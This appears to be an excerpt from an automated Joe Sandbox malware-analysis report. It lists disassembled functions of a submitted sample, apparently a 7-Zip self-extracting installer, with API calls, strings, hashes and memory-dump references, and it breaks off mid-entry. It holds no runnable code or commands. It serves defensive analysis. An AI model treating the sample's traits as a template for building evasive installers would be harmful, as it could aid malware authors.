                                                            Function 00409FE5 Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 182sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000064,00000000,SetEnvironment,00430ECC), ref: 0040A1D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle$\}B
                                                            • API String ID: 3472027048-4115378676
                                                            • Opcode ID: ae2ff29c1d8d4bd9679e6c2a48ee91b9128e84e6f5896222fad7da7b4a482fc2
                                                            • Instruction ID: bedb00c804a9dce52fb042db9870be84169c93686b5bf65811986762a050c4d9
                                                            • Opcode Fuzzy Hash: ae2ff29c1d8d4bd9679e6c2a48ee91b9128e84e6f5896222fad7da7b4a482fc2
                                                            • Instruction Fuzzy Hash: 8C513D7174430656EB24BBA5AC5376A33A0AB60718F20413FF601BA2D2EBFD4865C61F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004080E6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(?), ref: 004080F7
                                                            • GetSystemMetrics.USER32(0000000B), ref: 00408110
                                                            • GetSystemMetrics.USER32(0000003D), ref: 00408119
                                                            • GetSystemMetrics.USER32(0000003E), ref: 00408122
                                                            • SelectObject.GDI32(00000000,00000850), ref: 0040813E
                                                            • DrawTextW.USER32(00000000,?,000000FF,?,?), ref: 00408157
                                                            • SelectObject.GDI32(00000000,?), ref: 0040817E
                                                            • ReleaseDC.USER32(?,00000000), ref: 0040818B
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                            • String ID:
                                                            • API String ID: 2466489532-0
                                                            • Opcode ID: f6820cb6413f390631b252b691c9a3c0af8269733a29a03566abed7387fb7d31
                                                            • Instruction ID: 8b90712e8116e0942533d6e77e0129b97645ce25513bc7813625e55a2880145a
                                                            • Opcode Fuzzy Hash: f6820cb6413f390631b252b691c9a3c0af8269733a29a03566abed7387fb7d31
                                                            • Instruction Fuzzy Hash: 95212FB2600315AFCB20DF69DD4898ABBF8EF08360B12856AF559E72A0D774E941CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00422A39 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(?,?), ref: 00422AE5
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00422B68
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00422BDE
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00422BF5
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00422C59
                                                            • __freea.LIBCMT ref: 00422C84
                                                            • __freea.LIBCMT ref: 00422C90
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                            • String ID:
                                                            • API String ID: 2829977744-0
                                                            • Opcode ID: 6d28d3358b3276e0d94c3f0f3136fb53172ae4671ca37385b52b2fdc8a551ba5
                                                            • Instruction ID: 8285bbd09ef7b0c0ee5c57fc5ccfd74ba8cf8c46fcdc3056a30fc4808705d79e
                                                            • Opcode Fuzzy Hash: 6d28d3358b3276e0d94c3f0f3136fb53172ae4671ca37385b52b2fdc8a551ba5
                                                            • Instruction Fuzzy Hash: C181E271F00236BFDF219E65AA41AEF7BB5EF49310F98411BE801E7240D6A99C41C7A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00421B85 Relevance: 10.7, APIs: 7, Instructions: 162fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000001,00000020,?,?,?,?,?,?,?,00422311,00000008,00000001,00000020,0000002C,?), ref: 00421BC7
                                                            • __fassign.LIBCMT ref: 00421C46
                                                            • __fassign.LIBCMT ref: 00421C65
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 00421C92
                                                            • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00422311), ref: 00421CB2
                                                            • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00422311), ref: 00421CEC
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: a93bca8180c44db9697705af62f72fc56a01868df3ecc104863cc3e86e09c5d9
                                                            • Instruction ID: 332ff65ea62ea24fc713ba3a269693ca747d236056c4f5bde2047378310aa8af
                                                            • Opcode Fuzzy Hash: a93bca8180c44db9697705af62f72fc56a01868df3ecc104863cc3e86e09c5d9
                                                            • Instruction Fuzzy Hash: C651C774E10249EFCB10CFA4E885AEEBBF8EF19300F54452BE555E7251E734A941CB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409899 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004098D1
                                                            • GetDlgItem.USER32(?,000004B8), ref: 004098EE
                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004098FD
                                                            • wsprintfW.USER32 ref: 0040991B
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00409939
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                            • String ID: %d%%
                                                            • API String ID: 3151147563-1518462796
                                                            • Opcode ID: 868e86fb4d4d510285bfe777ea5755b65d80a978a047cb7e6f415effcfd695f0
                                                            • Instruction ID: f637d2492de31c1229f854405fa60f11d38a80dd1f2d17639c67080499e9bd2d
                                                            • Opcode Fuzzy Hash: 868e86fb4d4d510285bfe777ea5755b65d80a978a047cb7e6f415effcfd695f0
                                                            • Instruction Fuzzy Hash: 1131A2B1600704BFDB11EBA1DD95EDAB7A9FF08704F00442EF642A26A1DB79ED10DB18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004035E2 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!$`mB
                                                            • API String ID: 2111968516-1077897382
                                                            • Opcode ID: 7e8f41af8b7525ddbd871761bbf098a9df9138694012cf0490a6cf2d44a747b2
                                                            • Instruction ID: 7b5f0b34343c5af48474d793ec4b68a35cb49d3135a87e0c1221adfa52b08ffb
                                                            • Opcode Fuzzy Hash: 7e8f41af8b7525ddbd871761bbf098a9df9138694012cf0490a6cf2d44a747b2
                                                            • Instruction Fuzzy Hash: 5C21A374B00119BBCF21ABB2DC65DDE776DEF84314F14011FF902A3291CB7DAA418AA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041D942 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572
                                                            • Opcode ID: 4565154400d9fc70af5efe327cec3f0fadc2ef8f65c9b06ea84ad47489cc6ac3
                                                            • Instruction ID: 85049474143f3b65f29a43d7abd6339aecefbb44fdab7cfa6a52ed89712df6c7
                                                            • Opcode Fuzzy Hash: 4565154400d9fc70af5efe327cec3f0fadc2ef8f65c9b06ea84ad47489cc6ac3
                                                            • Instruction Fuzzy Hash: 1A21EBF2F15225ABC7318A299C41BAB37589F027A4F150623FC05A7390D738EC81C6ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409D47 Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00409D85
                                                            • GetDC.USER32(00000000), ref: 00409D90
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00409D9B
                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00409DAA
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409DB8
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00409DE0
                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00009AA1), ref: 00409E15
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
                                                            • String ID:
                                                            • API String ID: 3212456201-0
                                                            • Opcode ID: b8afe462444f894fa9437bb02f35f88efc33852da598584541394ca880ad6f26
                                                            • Instruction ID: 41a3572038c45cd95c6219dd3bd3f303ac6d380be5344806ae0eefe7e77ce253
                                                            • Opcode Fuzzy Hash: b8afe462444f894fa9437bb02f35f88efc33852da598584541394ca880ad6f26
                                                            • Instruction Fuzzy Hash: 4C21C375640214AFE7219B21DC49EFB7B7CEF86705F0400AAFE05A2291D7744E85CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420440 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00420408: _free.LIBCMT ref: 0042042D
                                                            • _free.LIBCMT ref: 0042048E
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 00420499
                                                            • _free.LIBCMT ref: 004204A4
                                                            • _free.LIBCMT ref: 004204F8
                                                            • _free.LIBCMT ref: 00420503
                                                            • _free.LIBCMT ref: 0042050E
                                                            • _free.LIBCMT ref: 00420519
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bbc923de42f0ef437122df3c82742138da79d0bd250d0da0117d0a182bfc7c1a
                                                            • Instruction ID: 40c45388451133dabe194adbec0cc104bd9175c2b7fa102719ef660aa07db31c
                                                            • Opcode Fuzzy Hash: bbc923de42f0ef437122df3c82742138da79d0bd250d0da0117d0a182bfc7c1a
                                                            • Instruction Fuzzy Hash: 3B11A572A40714A6D960B7B2DC07FC7B7DE6F00305F808C2EB3DAB6453C66CB5428668
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408577 Relevance: 10.6, APIs: 7, Instructions: 57timethreadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndDialog.USER32(?,00000000), ref: 00408590
                                                            • KillTimer.USER32(?,00000001), ref: 0040859F
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004085CA
                                                            • SuspendThread.KERNEL32(00000358), ref: 004085E4
                                                            • ResumeThread.KERNEL32(00000358), ref: 00408602
                                                            • EndDialog.USER32(?,00000000), ref: 00408625
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                            • String ID:
                                                            • API String ID: 4151135813-0
                                                            • Opcode ID: df015ecf6994bcf9eacdd674c66625ee174a51ecd91e35730547f3a93d2a2231
                                                            • Instruction ID: 840e89b2f988dce3486df2ce482cd34b5a1b492b3c82fa0c0664b2eddab64cb0
                                                            • Opcode Fuzzy Hash: df015ecf6994bcf9eacdd674c66625ee174a51ecd91e35730547f3a93d2a2231
                                                            • Instruction Fuzzy Hash: 9B117C30200710EBD3365F25EE49B2776B9FB84B0AF02957EF485A15F0DBBA5841DA1C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420F8E Relevance: 9.2, APIs: 6, Instructions: 197COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,0041F71C,00000000,?,?,?,004211A8,?,?,00000100), ref: 00420FE8
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,004211A8,?,?,00000100,5EFC4D8B,?,?), ref: 00421051
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00421131
                                                            • __freea.LIBCMT ref: 0042113E
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • __freea.LIBCMT ref: 00421147
                                                            • __freea.LIBCMT ref: 0042116C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: ed52da81be98cad59f77d7dec3568762f87e0dec4e3240853b208e1c15293500
                                                            • Instruction ID: 795d1206ec2f32b6e45d8f4c6aeb14b41ba3a0e263e28a30a8194dc37ba3b984
                                                            • Opcode Fuzzy Hash: ed52da81be98cad59f77d7dec3568762f87e0dec4e3240853b208e1c15293500
                                                            • Instruction Fuzzy Hash: FC51F272700226AFDB208F61EC41EBB76A9EF58750F95412BFD0497220DB39DC61C6A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00417F42 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00417F39,00417722), ref: 00417F50
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00417F5E
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00417F77
                                                            • SetLastError.KERNEL32(00000000,?,00417F39,00417722), ref: 00417FC9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: c50ac3d2e17a902f1afdc370a56ad2001809f836633e384901bf3d60c1394b7c
                                                            • Instruction ID: ca18b5c991625275113aef79fb163ab4564e05a7bf6e79e28dc18d15beadb5de
                                                            • Opcode Fuzzy Hash: c50ac3d2e17a902f1afdc370a56ad2001809f836633e384901bf3d60c1394b7c
                                                            • Instruction Fuzzy Hash: 1501B13220D312BEEB246775AC959A72B64EB41779B24133FF110811E1FF1A5CC2995C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041BE3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0041BDED,00000002,?,0041BDB5,00000003,0041BA09), ref: 0041BE5C
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041BE6F
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0041BDED,00000002,?,0041BDB5,00000003,0041BA09), ref: 0041BE92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 56a9787422a77ea311232f1cc68b65b8a11724992fe14d7af39dec5d91fa0809
                                                            • Instruction ID: 5458f3a08cd6e3352e2f015b9c494ccd23edcd2d2db0ada869f35469573445a7
                                                            • Opcode Fuzzy Hash: 56a9787422a77ea311232f1cc68b65b8a11724992fe14d7af39dec5d91fa0809
                                                            • Instruction Fuzzy Hash: B6F08131A41218FBCB109B50EC09BDEBFA4EB04711F41416AAC05A2250DB354D81CA98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040838A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(uxtheme,?,00408A54,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00408392
                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004083A3
                                                            • GetWindow.USER32(?,00000005), ref: 004083C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProcWindow
                                                            • String ID: SetWindowTheme$uxtheme
                                                            • API String ID: 1082215438-1369271589
                                                            • Opcode ID: 5c6d4a3635c1f48855c87e2279c61996faa1906528f89b42e0b1c93cab0b9681
                                                            • Instruction ID: 4de2d7984856ebe54f837cd3662e18a6830be01ca59371bf0d96b69c3f9fb0ea
                                                            • Opcode Fuzzy Hash: 5c6d4a3635c1f48855c87e2279c61996faa1906528f89b42e0b1c93cab0b9681
                                                            • Instruction Fuzzy Hash: BDE09231741731A2C23127207D0EF072A144BC1F50B97407AFC45B23D1AEBECC0285AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040444D Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 288COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SetEnvironment$`fB${\rtf
                                                            • API String ID: 0-3352311804
                                                            • Opcode ID: 7aedbfe648c8ee35d31b2598e2e2b1202613e43841c17d301e1a36df54b19bd3
                                                            • Instruction ID: f2c3317483333a74ea04750af235f0ee60b3ebbae44449659b5922bd37f1199e
                                                            • Opcode Fuzzy Hash: 7aedbfe648c8ee35d31b2598e2e2b1202613e43841c17d301e1a36df54b19bd3
                                                            • Instruction Fuzzy Hash: D9A1C5B1D00208AFDF11AF94DC41BEE7B75AF55308F14006BE601B72D2EB3D9A468B48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C5A6 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
